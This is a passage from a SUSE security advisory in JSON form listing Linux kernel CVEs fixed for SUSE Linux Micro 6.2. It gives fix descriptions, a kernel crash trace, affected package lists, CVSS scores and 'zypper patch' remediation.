"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
